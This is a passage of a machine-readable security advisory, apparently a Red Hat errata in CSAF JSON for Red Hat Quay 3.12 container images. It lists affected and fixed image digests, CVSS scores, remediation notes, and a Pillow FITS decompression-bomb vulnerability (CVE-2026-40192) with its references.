            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API"
    },
    {
      "cve": "CVE-2026-40192",
      "cwe": {
        "id": "CWE-409",
        "name": "Improper Handling of Highly Compressed Data (Data Amplification)"
      },
      "discovery_date": "2026-04-16T00:00:49.590876+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2458856"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "RHBZ#2458856",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
          "url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/pull/9521",
          "url": "https://github.com/python-pillow/Pillow/pull/9521"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
        },
        {
          "category": "external",
          "summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
          "url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
        }
      ],
      "release_date": "2026-04-15T22:53:56.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
